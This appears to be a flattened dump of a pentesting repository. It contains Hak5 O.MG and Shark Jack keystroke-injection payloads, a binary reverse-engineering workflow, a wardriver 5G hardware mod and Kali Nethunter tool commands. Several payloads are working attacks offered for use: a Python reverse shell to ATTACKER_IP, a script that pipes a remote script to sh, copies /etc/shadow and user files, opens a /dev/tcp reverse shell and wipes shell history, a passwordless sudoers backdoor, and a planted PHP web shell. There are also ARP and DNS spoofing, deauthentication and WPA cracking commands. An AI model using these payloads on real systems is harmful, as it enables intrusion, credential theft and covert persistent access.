$payloadLength = $payload.Length 131 | $chunkSize = 8 # Kept at 8 for best experience 132 | $chunkNr = [Math]::Ceiling($payloadLength / $chunkSize) 133 | 134 | for ($i = 0; $i -lt $chunkNr; $i++) { 135 | $bytes = New-Object Byte[] (65) 136 | $start = $i * $chunksize 137 | $end = [Math]::Min(($i + 1) * $chunksize, $payloadLength) 138 | $chunkLen = $end - $start 139 | [System.Buffer]::BlockCopy($payload, $start, $bytes, 1, $chunkLen) 140 | $filehandle.Write($bytes, 0, 65) 141 | } 142 | } 143 | 144 | Add-Type -TypeDefinition @" 145 | using System; 146 | using System.IO; 147 | using Microsoft.Win32.SafeHandles; 148 | using System.Runtime.InteropServices; 149 | namespace omg { 150 | public class hidx { 151 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] 152 | public static extern SafeFileHandle CreateFile(String fn, UInt32 da, Int32 sm, IntPtr sa, Int32 cd, uint fa, IntPtr tf); 153 | 154 | public static FileStream open(string fn) { 155 | return new FileStream(CreateFile(fn, 0XC0000000U, 3, IntPtr.Zero, 3, 0x40000000, IntPtr.Zero), FileAccess.ReadWrite, 3, true); 156 | } 157 | } 158 | } 159 | "@ 160 | try { 161 | $deviceString = Get-OMGDevice 162 | 163 | if ($deviceString -eq $null) { 164 | Write-Host -ForegroundColor Red "[!]Error: Could not find OMG device - Check VID/PID" 165 | return 166 | } 167 | 168 | $fileHandle = [omg.hidx]::open($deviceString) 169 | 170 | if ($fileHandle -eq $null) { 171 | Write-Host -ForegroundColor Red "[!]Error: Filehandle is empty" 172 | return 173 | } 174 | 175 | $payload = [System.Text.Encoding]::ASCII.GetBytes($Message + "`` `n") 176 | Send-Message -fileHandle $fileHandle -payload $payload 177 | 178 | } catch { 179 | Write-Host -ForegroundColor Red "[!]Error: $($PSItem.Exception.Message)" 180 | } finally { 181 | if ($fileHandle -ne $null) { 182 | $fileHandle.Close() 183 | } 184 | } 185 | } 186 | END_STRINGLN 187 | WIN_SAVEANDSTARTCMD(win-hidexfil.ps1) -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/iOS/OpenSafariLink/payload.txt: -------------------------------------------------------------------------------- 1 | REM Version 1.0 2 | REM OS: iOS & macOS 3 | REM Author: lukeswitz 4 | REM Description: Open a website in Safari. Delays set for iOS 17-17.1 and may need tweaks. 5 | 6 | DUCKY_LANG US 7 | DELAY 200 8 | GUI h 9 | DELAY 250 10 | GUI l 11 | DELAY 150 12 | GUI SPACE 13 | DELAY 350 14 | STRING Safari 15 | DELAY 250 16 | ENTER 17 | DELAY 400 18 | GUI t 19 | DELAY 400 20 | GUI l 21 | DELAY 400 22 | STRING apple.com 23 | DELAY 600 24 | ENTER -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/macOS/Locate-and-Alert-User/badHello.txt: -------------------------------------------------------------------------------- 1 | REM For Windows and MacOS: Make the computer say a personalized fun message including geolocation 2 | DELAY 500 3 | 4 | REM Try the Windows way (this will do nothing on MacOS) 5 | GUI d 6 | DELAY 500 7 | GUI r 8 | DELAY 500 9 | STRING powershell "Add-Type -TypeDefinition 'public class Speech { public void Speak(string text) { (New-Object -ComObject SAPI.SpVoice).Speak(text); } }'; $location = Invoke-RestMethod -Uri 'http://ip-api.com/json/'; (New-Object Speech).Speak('Don\'t mind me, ' + [Environment]::UserName + ', I\'m just a talking computer in ' + $location.city + ', ' + $location.regionName + ', ' + $location.country + '.'); exit;" 10 | ENTER 11 | 12 | REM Try the MacOS way (this will do nothing on Windows) 13 | GUI SPACE 14 | DELAY 500 15 | STRING Terminal 16 | ENTER 17 | DELAY 500 18 | STRING location=$(curl -s http://ip-api.com/json/); say "Don't mind me, $(whoami), I'm just a talking computer in $(echo $location | jq -r '.city'), $(echo $location | jq -r '.regionName'), $(echo $location | jq -r '.country')."; exit; 19 | ENTER 20 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/macOS/Python-Reverse-Shell/payload.txt: -------------------------------------------------------------------------------- 1 | DELAY 1000 2 | GUI 3 | DELAY 200 4 | GUI SPACE 5 | DELAY 1000 6 | STRING Terminal 7 | ENTER 8 | DELAY 2000 9 | STRING python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' 10 | ENTER 11 | GUI h -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/macOS/Quiet-Shell/payload.txt: -------------------------------------------------------------------------------- 1 | DELAY 500 2 | REM Description: This script downloads a remote script, performs data exfiltration, sets up a reverse shell, and cleans its traces, demonstrating a comprehensive USB keystroke injection penetration test. 3 | 4 | REM Open Terminal 5 | GUI SPACE 6 | DELAY 500 7 | STRING Terminal 8 | ENTER 9 | DELAY 500 10 | 11 | REM Download and run a script from a remote server 12 | STRING curl http://your-server.com/script.sh | sh 13 | ENTER 14 | DELAY 1000 15 | 16 | REM Create directories 17 | STRING mkdir -p /exfilit/files 18 | ENTER 19 | DELAY 500 20 | 21 | REM Attempt to copy user data if read permissions are available 22 | STRING if [ -r /etc/passwd ]; then cp /etc/passwd /exfilit/files; fi 23 | ENTER 24 | STRING if [ -r /etc/shadow ]; then cp /etc/shadow /exfilit/files; fi 25 | ENTER 26 | DELAY 500 27 | 28 | REM Find and copy files under 70MB 29 | STRING find ~/Documents ~/Downloads -type f -size -70M -exec cp -n {} /exfilit/files \; 30 | ENTER 31 | 32 | REM Set up a reverse shell for persistent access 33 | STRING bash -i >& /dev/tcp/your-server.com/8080 0>&1 & 34 | ENTER 35 | 36 | REM Clean up any trace of its actions from system logs 37 | STRING history -c 38 | ENTER 39 | STRING rm ~/.bash_history 40 | ENTER 41 | 42 | REM Exit the terminal 43 | STRING exit 44 | ENTER 45 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/macOS/SetupHIDXTargetShell/payload.txt: -------------------------------------------------------------------------------- 1 | DUCKY_LANG US 2 | DELAY 2000 3 | META SPACE 4 | DELAY 500 5 | STRINGLN terminal 6 | DELAY 500 7 | STRINGLN nano ./setup.sh 8 | DELAY 1000 9 | STRINGLN #!/bin/sh 10 | STRINGLN /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" 11 | STRINGLN brew install python3 python3-pip 12 | STRINGLN python3 -m ensurepip 13 | STRINGLN mkdir ~/payload && cd ~/payload/ 14 | STRINGLN pip3 install libusb_package pyusb 15 | STRINGLN echo '%admin ALL=(ALL) NOPASSWD: ALL' > /etc/sudoers.d/hxs 16 | STRINGLN wget https://github.com/O-MG/O.MG-Firmware/blob/beta/tools/HIDX/python/hidxshell.py 17 | CTRL x 18 | STRINGLN y 19 | STRINGLN chmod +x setup.sh && ./setup.sh && rm ./setup.sh 20 | DELAY 2000 21 | STRINGLN screen -dmS hxs python3 hidxshell.py -------------------------------------------------------------------------------- /hardware/Hak5-oMG/readme.md: -------------------------------------------------------------------------------- 1 | > [!NOTE] 2 | > Payloads in the omg folder also work with other devices. Ducky Script is cool that way. 3 | > 4 | 5 | ```pre 6 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠒⢤⡀⢤⣤⣤⣤⠄⣤⠒⠂⠀⠀⠀⠀⠀⠀⠀⠀⠀ 7 | ⠀⠀⠀⠀⠀⠀⠀⠀⣠⡴⢋⣼⠇⣈⣉⣉⣉⡘⣿⡈⢷⣄⠀⠀⠀⠀⠀⠀⠀⠀ 8 | ⠀⠀⠀⠀⠀⠀⢀⣼⡿⠡⣿⡏⠼⠛⠛⠛⠛⠷⠈⣿⡆⠹⣷⡀⠀⠀⠀⠀⠀⠀ 9 | ⠀⠀⠀⠀⠀⠀⣾⡟⢀⡘⢿⣷⣶⣾⠿⠿⢷⣶⣾⣿⠇⡄⠹⣿⡀⠀⠀⠀⠀⠀ 10 | ⠀⠀⠀⠀⠀⢨⣿⠁⣼⡗⠀⣿⡏⠀⠀⠀⠀⠙⣿⡅⢸⣿⠀⣿⡇⠀⠀⠀⠀⠀ 11 | ⠀⠀⠀⠀⠀⢸⣿⠀⣿⡇⠘⣿⡄⠀⠀⠀⠀⢀⣼⡇⢨⣿⠀⣼⡇⠀⠀⠀⠀⠀ 12 | ⠀⠀⠀⠀⠀⠘⣿⡄⢹⣷⡀⢻⣷⣄⡀⠀⣀⣼⡿⣷⣎⠻⠀⣽⡇⠀⠀⠀⠀⠀ 13 | ⠀⠀⠀⠀⠀⠀⠹⣷⡀⠻⣷⣄⡉⠛⠿⠿⠛⠋⣠⣾⡟⢀⣼⡟⠀⠀⠀⠀⠀⠀ 14 | ⠀⠀⠀⠀⠀⠀⠀⠙⢿⣦⡈⠛⠿⣷⣶⣶⣾⠿⠟⢉⣠⣾⠟⠀⠀⠀⠀⠀⠀⠀ 15 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢉⣥⣂⣀⣤⣤⣤⣤⣴⣾⠿⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀ 16 | ⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣟⡛⠋⠉⠉⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 17 | ⠀⠀⠀⠀⠀⠀⠀⠀⠞⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 18 | ``` 19 | #### Links 20 | - [Official Hak5 Payloads](https://github.com/hak5) 21 | - [o.mg.lol](https://o.mg.lol) 22 | - [Hak5 O.MG PayloadHub](https://hak5.org/blogs/payloads/tagged/omg) 23 | - [@I-Am-Jakoby hak5-submissions](https://github.com/I-Am-Jakoby/hak5-submissions) 24 | - [I-Am-Jakoby Powershell-to-Ducky-Converte](https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter) 25 | - [@Peaakss](https://github.com/Peaakss/) 26 | 27 | 28 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/rubberducky/placeholder.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/sharkjack/LAMPooned/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Shark Jack Payload: XAMPP Persistence 3 | # Author: lukeswitz 4 | 5 | # Setup 6 | LED SETUP 7 | NETMODE TRANSPARENT 8 | sleep 5 9 | 10 | # Change the MAC address of the network interface 11 | macchanger -r eth0 12 | 13 | # Download and install XAMPP 14 | wget https://www.apachefriends.org/xampp-files/7.4.11/xampp-linux-x64-7.4.11-0-installer.run 15 | chmod +x xampp-linux-x64-7.4.11-0-installer.run 16 | sudo ./xampp-linux-x64-7.4.11-0-installer.run 17 | 18 | # Start XAMPP 19 | /opt/lampp/lampp start 20 | 21 | # Set up environment for XAMPP 22 | echo 'export PATH=\"/opt/lampp/bin:$PATH\"' >> ~/.bash_profile 23 | curl -sS https://getcomposer.org/installer | \ 24 | sudo /opt/lampp/bin/php -- \ 25 | --install-dir=/opt/lampp/bin --filename=composer 26 | 27 | # Set up a database and user for persistence 28 | mysql -u root <<-EOF 29 | CREATE DATABASE persistence; 30 | CREATE USER 'persistence'@'localhost' IDENTIFIED BY 'persistence'; 31 | GRANT ALL PRIVILEGES ON persistence.* TO 'persistence'@'localhost'; 32 | FLUSH PRIVILEGES; 33 | EOF 34 | 35 | # Download and set up a PHP web shell for remote access 36 | wget https://github.com/flozz/p0wny-shell/raw/master/shell.php -O /opt/lampp/htdocs/shell.php 37 | 38 | LED ATTACK 39 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/sharkjack/byon-nmap.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Bring your own network NMAP 4 | # Author: whoisroot 5 | # Version: 1.3 6 | # 7 | # Scans target subnet with Nmap using specified options. Saves each scan result 8 | # to loot storage folder. Includes SERIAL_WRITE commands for Shark Jack Cable. 9 | # 10 | # LED SETUP ... Starting DHCP server 11 | # LED SPECIAL ... Waiting for host to aquire IP address from DHCP 12 | # LED ATTACK ... Scanning 13 | # LED FINISH ... Scan Complete 14 | # 15 | # See nmap --help for options. Default "-sS -sV -p- -O" scans first using 16 | # SYN packets and then scans all TCP ports, verifies reported versions 17 | # listening and determines the OS. 18 | 19 | 20 | echo "started payload" > /tmp/payload-debug.log 21 | NMAP_OPTIONS="-sS -p- -sV -O --max-retries 3" 22 | LOOT_DIR=/root/loot/BYON_nmap 23 | 24 | # Setup loot directory, DHCP server, and wait for host 25 | SERIAL_WRITE [*] Setting up payload 26 | LED SETUP 27 | mkdir -p $LOOT_DIR 28 | COUNT=$(($(ls -l $LOOT_DIR/*.txt | wc -l)+1)) 29 | echo "starting DHCP server" >> /tmp/payload-debug.log 30 | SERIAL_WRITE [*] Starting DHCP server 31 | NETMODE DHCP_SERVER 32 | LED SPECIAL 33 | sleep 30 34 | SERIAL_WRITE [*] Waiting for IP from DHCP 35 | while [ -z "$TARGET" ]; do 36 | sleep 1 && TARGET=$(cut -d" " -f3 /tmp/dhcp.leases) 37 | done 38 | echo -e "Target got IP $TARGET from DHCP\n\n" >> /tmp/payload-debug.log 39 | 40 | # Scan target 41 | LED ATTACK 42 | SERIAL_WRITE [*] Starting nmap scan... 43 | nmap -vv $NMAP_OPTIONS -oN $LOOT_DIR/nmap-scan_$COUNT.txt $TARGET 2>&1 | tee -a /tmp/payload-debug.log 44 | echo -e "\n\nscanned host" >> /tmp/payload-debug.log 45 | sleep 2 && sync 46 | LED FINISH 47 | SERIAL_WRITE [*] Payload complete! 48 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/sharkjack/sneaky-beacon/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Shark Jack Payload: Advanced Network Reconnaissance and Exploitation 3 | # Author: lukeswitz 4 | 5 | # Setup 6 | LED SETUP 7 | NETMODE TRANSPARENT 8 | sleep 5 9 | 10 | # Create loot directory 11 | mkdir -p /root/loot 12 | 13 | # Change the MAC address of the network interface 14 | macchanger -r eth0 > /root/loot/macchanger_output.txt 15 | 16 | # Perform a network scan using nmap 17 | nmap -sC -sV -Pn 192.168.1.0/24 > /root/loot/nmap_scan.txt 18 | 19 | # Capture network traffic using tcpdump 20 | tcpdump -i eth0 -w /root/loot/captured_traffic.pcap & 21 | 22 | # Sleep to allow for network traffic capture 23 | sleep 300 24 | 25 | # Kill tcpdump process 26 | pkill tcpdump 27 | 28 | # Set up a reverse shell for persistent access 29 | bash -i >& /dev/tcp//8080 0>&1 & 30 | 31 | LED ATTACK 32 | -------------------------------------------------------------------------------- /hardware/Reversing/macOS-tools-workflow.md: -------------------------------------------------------------------------------- 1 | # Full Reverse Engineering Workflow for Binary Files 2 | 3 | > [!TIP] 4 | > First, ensure you have the tools installed: [macOS get tools script](#macOS-toolkit-installer) 5 | 6 | 7 | 8 | ## 1. FILE IDENTIFICATION 9 | --- 10 | ```bash 11 | file 12 | strings | less 13 | xxd | head 14 | hexdump -C | head 15 | ``` 16 | 17 | ## 2. HASHING & COMPARISON 18 | --- 19 | ```bash 20 | sha256sum 21 | md5sum 22 | cmp 23 | ``` 24 | 25 | ## 3. STATIC ANALYSIS 26 | --- 27 | ```bash 28 | binwalk -eM 29 | binwalk -B 30 | binwalk --dd='.*' 31 | 32 | exiftool 33 | readelf -a 34 | objdump -D > out.asm 35 | nm -D 36 | ltrace 37 | strace -f -e trace=all -s 1000 -o strace.log ./binary 38 | strings | grep -iE 'password|key|token|secret' 39 | ``` 40 | 41 | ## 4. FILESYSTEM EXTRACTION 42 | --- 43 | ```bash 44 | binwalk -e 45 | unsquashfs 46 | cramfsck -x 47 | jffs2dump --image= --output=./out 48 | ``` 49 | 50 | ## 5. FORMAT-SPECIFIC DECODING 51 | --- 52 | ```bash 53 | gzip -d 54 | lzma -d 55 | xz -d 56 | zstd -d 57 | 58 | openssl enc -d -aes-128-cbc -in file 59 | xxd -r 60 | base64 -d 61 | zlib-flate -uncompress < file 62 | ``` 63 | 64 | ## 6. ARCHIVE EXTRACTION 65 | --- 66 | ```bash 67 | 7z x 68 | unrar x 69 | tar -xvf 70 | binwalk --matryoshka 71 | ``` 72 | 73 | ## 7. CODEC / COMPRESSED DATA EXTRACTION 74 | --- 75 | ```bash 76 | foremost -i -o outdir 77 | scalpel -o outdir 78 | bulk_extractor -o outdir -e all 79 | ``` 80 | 81 | ## 8. DISASSEMBLY & INTERACTIVE RE 82 | --- 83 | ```bash 84 | # Ghidra: Load binary, auto-analyze 85 | # Binary Ninja: Load, rename, analyze 86 | # IDA Pro: Load, run auto-analysis 87 | r2 -A 88 | aaa 89 | pdf @ main 90 | ``` 91 | 92 | ## 9. SYMBOL RECOVERY & DECOMPILATION 93 | --- 94 | ```bash 95 | # Ghidra / Binary Ninja decompiler view 96 | retdec-decompiler.py 97 | # In radare2: 98 | r2ghidra-dec 99 | ``` 100 | 101 | ## 10. DYNAMIC ANALYSIS 102 | --- 103 | ```bash 104 | gdb ./binary 105 | qemu-*-static ./binary 106 | valgrind ./binary 107 | strace -f -s 500 ./binary 108 | ltrace ./binary 109 | ``` 110 | 111 | ## 11. PATCHING / MODIFICATION 112 | --- 113 | ```bash 114 | hexedit 115 | bvi 116 | xxd > out.hex && vim out.hex && xxd -r out.hex > new_binary 117 | radare2 -w ; wx @ 118 | # Ghidra/Binary Ninja: edit & re-export 119 | ``` 120 | 121 | ## 12. ADVANCED BINARY PARSING 122 | --- 123 | ```bash 124 | # All require Python3 125 | # angr symbolic execution 126 | # manticore multi-arch symbolic execution 127 | # unicorn CPU emulation 128 | # qiling sandboxed emulation 129 | ``` 130 | 131 | ## 13. STRIPPED BINARIES / RECOVERY 132 | --- 133 | ```bash 134 | # Use Diaphora or FLIRT for signature-based recovery 135 | # Cross-reference functions manually in Binary Ninja / Ghidra 136 | ``` 137 | 138 | ## 14. OBFUSCATION / PACKER DETECTION 139 | --- 140 | ```bash 141 | Detect-It-Easy 142 | upx -d 143 | binwalk -B # entropy 144 | ``` 145 | 146 | ## 15. EMULATION ENVIRONMENT 147 | --- 148 | ```bash 149 | qemu-user-static 150 | chroot with binfmt_misc 151 | docker export + chroot 152 | ``` 153 | 154 | ## 16. NETWORK BINARY RE 155 | --- 156 | ```bash 157 | wireshark 158 | mitmproxy 159 | pcapdump + strings 160 | ``` 161 | 162 | ## 17. FULL AUTOMATION SUITES 163 | --- 164 | ```bash 165 | firmadyne 166 | firmwalker 167 | firmware-mod-kit 168 | ghidra/analyzeHeadless 169 | binaryninja/headless 170 | ``` 171 | 172 | ## macOS toolkit installer 173 | ```bash 174 | #!/bin/bash 175 | set -e 176 | 177 | # Prerequisites 178 | xcode-select --install || true 179 | brew update 180 | 181 | # Core utilities 182 | brew install binutils coreutils findutils wget gnu-sed 183 | 184 | # Binaries & RE Tools 185 | brew install binwalk 186 | brew install capstone 187 | brew install radare2 188 | brew install ghidra 189 | brew install binaryninja 190 | brew install gdb 191 | brew install gnuplot 192 | brew install lz4 lzop xz gzip zstd zlib bzip2 p7zip unrar 193 | brew install openssl 194 | brew install squashfs 195 | brew install upx 196 | brew install hashcat 197 | brew install yara 198 | brew install foremost scalpel bulk_extractor 199 | brew install qemu qemu-user-static 200 | brew install exiftool 201 | brew install pyqt@5 202 | 203 | # Python Tools 204 | brew install python3 205 | pip3 install --upgrade pip 206 | pip3 install angr manticore unicorn qiling capstone 207 | pip3 install r2pipe 208 | pip3 install retdec-python 209 | pip3 install lief 210 | pip3 install zstandard 211 | 212 | # Ghidra headless support 213 | brew install openjdk 214 | export JAVA_HOME=$(/usr/libexec/java_home) 215 | 216 | # Cutter GUI 217 | brew install --cask cutter 218 | 219 | # Optional GUI / Emu tools 220 | brew install --cask wireshark 221 | brew install --cask mitmproxy 222 | 223 | # Optional tools: firmadyne, firmware-mod-kit, firmwalker 224 | git clone https://github.com/rampageX/firmware-mod-kit.git 225 | git clone https://github.com/craigz28/firmwalker.git 226 | git clone https://github.com/firmadyne/firmadyne.git 227 | 228 | echo "Setup complete. Add Binary Ninja manually if not using Homebrew-managed version." 229 | ``` 230 | -------------------------------------------------------------------------------- /hardware/Upgrades-Mods/Jhewitt5gmod.md: -------------------------------------------------------------------------------- 1 | # Rev3 5G/UFL Mod 2 | 3 | ### Table of Contents 4 | 1. [Overview](#overview) 5 | 2. [Requirements](#1-requirements) 6 | 3. [Connecting the BW16](#2-preparing-the-bw16) 7 | 4. [Configuration](#3-configuration) 8 | 5. [Verifying Connection](#4-verifying-connection) 9 | 6. [Troubleshooting](#5-troubleshooting) 10 | 7. [Build Modifications](#6-build-modifications) 11 | 12 | ### Overview 13 | Adds 5GHz scanning to the wardriver.uk. **A modified case or slim build is needed to ensure space for the extra board.** 14 | 15 | The [Build Modifications](#6-build-modifications) section at the bottom of the page also has 3D-printable cases that will fit without modification. 16 | 17 | *As described by the creator of this project, Joseph Hewitt:* 18 | 19 | >"The RX/TX of the BW16 should match the SIM800L RX/TX (but don't also connect the SIM800). I'm using the default BW16 AT firmware for now, so don't flash it. 20 | Update A and B from the git main branch, then read the last entry here: wardriver.uk/advanced_config" 21 | 22 | ## 1. Requirements 23 | - BW16 module flashed with AT firmware (USB-C units are not compatible w/o flashing) 24 | - [Wardriver.uk](wardriver.uk) rev3 w/o SIM800L 25 | - UFL adapter for the antenna 26 | - Beginner to intermediate soldering knowledge for the UFL antenna mod. 27 | 28 | ## 2. Preparing the BW16 29 | 30 | > [!WARNING] 31 | > Either the SIM800L or BW16 can be used. **Do not attach both**. This mod sacrifices GSM towers for 5G WiFi networks. 32 | 33 | ### AT Firmware Configuration 34 | 35 | **Micro-USB Version:** 36 | The micro-USB version is pre-installed with AT firmware, facilitating immediate deployment. 37 | 38 | **USB-C Version:** 39 | The black USB-C version requires a firmware downgrade. Follow this comprehensive [guide](https://gist.github.com/lukeswitz/ce2aa050e40f398eff0674ae06e95e1e) 40 | 41 | 42 | 43 | ![image](https://github.com/Root-Down-Digital/pentesting-resources/assets/10099969/5b36a4b1-6957-431d-92da-516e9eecd43d) 44 | 45 | 46 | 47 | 48 | 49 | ### UFL 50 | ***The soldering can be skipped if you want to use the trace antenna instead.*** 51 | 52 | - Solder the UFL to the pads on the corner of the MCU. Note the orientation on bottom, and apply a little tip tinner & flux if you wish. 53 | 54 | Heat one pad, then quickly move the UFL into position. This must be done with some care and accuracy, but is basic surface soldering. Ensure all three contacts are solid. 55 | 56 | ### Resistor/Solder Bridge 57 | - To activate the external antenna, remove the cover from the BW16. Remove the 0ohm resistor shown in red. Reuse the resistor or solder bridge on the green. Replace cover & tack the corners or reflow (or leave it off). 58 | 59 | ![image](https://github.com/Root-Down-Digital/pentesting-resources/assets/10099969/cae9f924-3cbe-4d57-a12c-3ac39fefaa04) 60 | 61 | *Image credit: @CoD_Segfault 62 | 63 | ![image](https://github.com/Root-Down-Digital/pentesting-resources/assets/10099969/a9ad8fc1-6436-4c54-ab06-f8a3666be4cd) 64 | 65 | ![image](https://github.com/Root-Down-Digital/pentesting-resources/assets/10099969/3def9a47-e0bd-4c29-84cf-688b4930a496) 66 | *Shown before/after with a simple solder bridge and resistor removed. 67 | 68 | - Test the antenna using an Arduino sketch to validate. Test polarity and continuity manually. 69 | 70 | ### Wiring 71 | 72 | - Connect RX/TX of the BW16 to the corresponding RX/TX on the board for the SIM800L. 73 | - Connect the GND and VCC of the BW16 to the same row: 74 | 75 | | SIM800L PCB Pin | BW16 Connection | 76 | |-----------|-----------------| 77 | | 5V | VCC | 78 | | Pin 2 | Not Used | 79 | | RX | RX | 80 | | TX | TX | 81 | | GND | GND | 82 | 83 | ![image](https://github.com/Root-Down-Digital/pentesting-resources/assets/10099969/480fe41f-413c-4852-8a7b-0668ba2d89ad) 84 | 85 | 86 | ## 3. Configuration 87 | 88 | - **Create a plain text file named `cfg.txt`in the root folder of the SD card.** *This is the [advanced config file](wardriver.uk/advanced_config) and has several features.* 89 | 90 | - **Add the line: `sb_bw16=yes` and save the file.** 91 | 92 | ## 4. Verifying Connection 93 | 94 | - Unit should display rev3 5g (mod) when initializing. 95 | 96 | - Once running, an additional number for 5G nets is added next to the 2G count: `WiFi:25|20` 97 | 98 | ## 5. Troubleshooting 99 | 100 | > [!IMPORTANT] 101 | > "There was a breaking change to the upstream ESP32 board library recently. Make sure you are using 2.0.12 because the 3.x branch isn't compatible yet" - Joseph Hewitt 102 | 103 | ## 6. Build Modifications 104 | 105 | > [!TIP] 106 | > Angle the "A" board, allowing enough room for a USB cable. Test while assembling: 107 | ![image](https://github.com/Root-Down-Digital/pentesting-resources/assets/10099969/afbbf3d7-7c75-4740-a3e8-68f7ed1c509a) 108 | 109 | > [!TIP] 110 | > Solder the SD without the headers, insulate with tape for a few mm of space where the BW16 board (pins removed) will sit. 111 | > ![image](https://github.com/Root-Down-Digital/pentesting-resources/assets/10099969/1022a50c-d0bb-491f-a843-15096d13b7ed) 112 | 113 | - Cut pins flush on the back of the board for a better fit in the micro case linked below. 114 | 115 | 116 | ### 5G Mod Cases 117 | 118 | You can find cases made by others, modified to accommodate the three bulkheads [here](https://github.com/lukeswitz/3D-Prints/tree/main/Hewitt-Wardriver). Files with `5gFit` prefix fit well without build modifications. 119 | 120 | ![image](https://github.com/Root-Down-Digital/pentesting-resources/assets/10099969/bb499406-4c3e-429b-b93f-93f83e78c329) 121 | 122 | 123 | > [!TIP] 124 | > Slide in the SMA bulkheads first. Twist to ensure the UFLs will lay as flat as possible to the board. Then, angling the board down under the pigtails, carefully slide and seat it. 125 | 126 | --- 127 | 128 | 129 | > [!NOTE] 130 | > ### Disclaimer 131 | > By using the content in this repository, you acknowledge that you do so at your own risk. We are not liable for any damages or issues that may arise from attempting the modifications or any other use of this material. The firmware mentioned is proprietary and not included here. For takedown requests or suggestions, please contact us directly. 132 | -------------------------------------------------------------------------------- /hardware/Upgrades-Mods/PimpMyNethunter.md: -------------------------------------------------------------------------------- 1 | 2 | # Kali Nethunter Additions 3 | 4 | ## Bettercap 5 | Bettercap is a powerful, flexible, and easy-to-use network monitoring and attack tool. It is designed to perform various MITM (Man-In-The-Middle) attacks and can also be used for network analysis. 6 | 7 | 8 | - Learn how to perform ARP spoofing. 9 | - Understand how to intercept and manipulate HTTP/HTTPS traffic. 10 | - Perform Bluetooth Low Energy (BLE) reconnaissance. 11 | 12 | **Commands:** 13 | 1. Install Bettercap: 14 | ```sh 15 | sudo apt install -y bettercap 16 | ``` 17 | 18 | 2. Start Bettercap with basic sniffing: 19 | ```sh 20 | sudo bettercap -X 21 | ``` 22 | 23 | 3. ARP spoofing to intercept traffic: 24 | ```sh 25 | sudo bettercap -iface wlan0 -eval "net.probe on; net.recon on; net.sniff on; set arp.spoof.targets 192.168.1.1; arp.spoof on" 26 | ``` 27 | 28 | 4. Perform DNS spoofing: 29 | ```sh 30 | sudo bettercap -eval "set dns.spoof.domains example.com; set dns.spoof.address 192.168.1.2; dns.spoof on" 31 | ``` 32 | 33 | 5. HTTPS stripping: 34 | ```sh 35 | sudo bettercap -eval "https.proxy on; https.proxy.gateway 192.168.1.1; https.proxy.ipv4 192.168.1.2" 36 | ``` 37 | 38 | 6. BLE (Bluetooth Low Energy) reconnaissance: 39 | ```sh 40 | sudo bettercap -eval "ble.recon on" 41 | ``` 42 | 43 | ## Nmap 44 | Nmap ("Network Mapper") is a free and open-source utility for network discovery and security auditing. 45 | 46 | 47 | - Perform network scanning to discover devices. 48 | - Conduct detailed scans to gather information about services and operating systems. 49 | - Identify vulnerabilities using NSE scripts. 50 | 51 | **Commands:** 52 | 1. Install Nmap: 53 | ```sh 54 | sudo apt install -y nmap 55 | ``` 56 | 57 | 2. Scan a local network to find all active devices: 58 | ```sh 59 | nmap -sn 192.168.1.0/24 60 | ``` 61 | 62 | 3. Perform a detailed scan on a specific host: 63 | ```sh 64 | nmap -A 192.168.1.1 65 | ``` 66 | 67 | 4. Scan for open ports on a range of IP addresses: 68 | ```sh 69 | nmap -p 1-65535 192.168.1.0/24 70 | ``` 71 | 72 | 5. Check for vulnerabilities with NSE scripts: 73 | ```sh 74 | nmap --script vuln 192.168.1.1 75 | ``` 76 | 77 | ## Aircrack-ng 78 | Aircrack-ng is a complete suite of tools to assess WiFi network security. It focuses on different areas of WiFi security. 79 | 80 | 81 | - Perform deauthentication attacks. 82 | - Capture WPA/WPA2 handshakes. 83 | - Crack WiFi passwords using captured handshakes. 84 | 85 | **Commands:** 86 | 1. Install Aircrack-ng: 87 | ```sh 88 | sudo apt install -y aircrack-ng 89 | ``` 90 | 91 | 2. Start monitor mode: 92 | ```sh 93 | sudo airmon-ng start wlan0 94 | ``` 95 | 96 | 3. Perform a deauth attack to disconnect clients: 97 | ```sh 98 | sudo aireplay-ng --deauth 1000 -a 00:11:22:33:44:55 wlan0mon 99 | ``` 100 | 101 | 4. Capture handshake for cracking WPA/WPA2: 102 | ```sh 103 | sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w /path/to/output wlan0mon 104 | ``` 105 | 106 | 5. Crack captured handshake: 107 | ```sh 108 | sudo aircrack-ng -w /path/to/wordlist /path/to/output.cap 109 | ``` 110 | 111 | ## Wireshark 112 | Wireshark is the world’s foremost and widely-used network protocol analyzer. 113 | 114 | 115 | - Capture and analyze network packets. 116 | - Filter packets to focus on specific traffic. 117 | - Follow TCP streams to understand session data. 118 | 119 | **Commands:** 120 | 1. Install Wireshark: 121 | ```sh 122 | sudo apt install -y wireshark 123 | ``` 124 | 125 | 2. Capture and analyze network packets on a specific interface: 126 | ```sh 127 | sudo wireshark -i wlan0 128 | ``` 129 | 130 | 3. Filter packets to show only HTTP traffic: 131 | ```sh 132 | http 133 | ``` 134 | 135 | 